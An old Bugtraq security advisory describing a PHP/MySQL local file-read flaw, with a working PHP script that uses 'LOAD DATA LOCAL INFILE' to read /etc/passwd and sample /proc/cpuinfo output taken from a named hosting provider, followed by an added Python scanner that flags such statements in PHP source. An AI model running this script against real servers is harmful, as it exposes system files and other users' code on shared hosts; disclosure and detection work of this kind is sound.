
File reading vulnerable in PHP and MySQL (Local Exploit)


Date: 26 Nov 2002 10:57:52 -0000
From: Hai Nam Luke <hainamluke@hotmail.com>
To: bugtraq@securityfocus.com
Subject: File reading vulnerable in PHP and MySQL (Local Exploit)



An attacker can use PHP and MySQL to read some local files in the following way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)


<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view

// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser, $dbpasswd);
$sql = array (
    "USE $dbname",
    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
    . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
    . "ESCAPED BY '' "
    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
    $query = mysql_query ($statement);
    if ($query == false) die (
        "FAILED: " . $statement . "\n" .
        "REASON: " . mysql_error () . "\n"
    );
    if (! $r = @mysql_fetch_array ($query, MYSQL_NUM)) continue;
    echo htmlspecialchars($r[0]);
    mysql_free_result ($query);
}
echo "</pre>";
?>
You'll receive all the source of /etc/passwd.

This vulnerability is very dangerous because a user can read some important files on your server. Especially, on any free host, a user can use the local exploit to read the source code of other users and attack one another.

Example: I uploaded this file and configured it at http://members.lycos.co.uk/ and I received their file "/proc/cpuinfo":

processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips        : 1992.29

processor       : 1
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips        : 1992.29

And many other files, please check your server!

Thanks to dodo.
Sorry for my poor English!

Luke (HVA)
http://www.hackervn.net
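
For administrators checking hosted web roots for scripts of the kind posted above, the following is an added example and not part of the original post: a Python scanner that reports every LOAD DATA ... LOCAL INFILE statement in PHP source, including ones split across concatenated strings. The function name, the sample snippets and the command-line path are assumptions made for illustration.

```python
import pathlib
import re
import sys

# Gap between keywords: whitespace, or a PHP string break such as
# "LOAD DATA " . "LOCAL INFILE" (quote, dot, quote).
GAP = r"""(?:\s|["']\s*\.\s*["'])+"""
LOAD_LOCAL = re.compile(
    r"\bLOAD" + GAP + "DATA" + GAP
    + "(?:(?:LOW_PRIORITY|CONCURRENT)" + GAP + ")?"
    + "LOCAL" + GAP + "INFILE"
    + r"""\s*(?P<target>'[^']*'|"[^"]*")?""",
    re.IGNORECASE,
)

def find_load_local(php_source):
    """Return one finding per LOAD DATA LOCAL INFILE statement in the text."""
    findings = []
    for m in LOAD_LOCAL.finditer(php_source):
        target = m.group("target") or ""
        findings.append({
            "line": php_source.count("\n", 0, m.start()) + 1,
            "target": target.strip("'\""),
            "dynamic": "$" in target,  # path built from a PHP variable
        })
    return findings

# Constructed samples. The first uses the statement shape from the post.
SAMPLE_POST_STYLE = '''<?php
$sql = "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
     . "TERMINATED BY '__THIS_NEVER_HAPPENS__'";
'''
SAMPLE_SPLIT = '''<?php
// keywords split across concatenated strings, lower case
$q = "load data " .
     "local infile '/tmp/import.csv' into table t";
'''
SAMPLE_BENIGN = '''<?php
$q = "LOAD DATA INFILE '/var/lib/mysql-files/x.csv' INTO TABLE t";
$r = "SELECT local, infile FROM notes";
'''

if __name__ == "__main__":
    # Usage: python find_load_local.py /path/to/webroot (path is an assumption)
    for path in pathlib.Path(sys.argv[1]).rglob("*.php"):
        for f in find_load_local(path.read_text(errors="replace")):
            print(f"{path}:{f['line']}: LOCAL INFILE {f['target']!r} "
                  f"dynamic={f['dynamic']}")
```

A finding with dynamic=True means the file path comes from a PHP variable, which is the shape used in the posted script and the one to review first.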
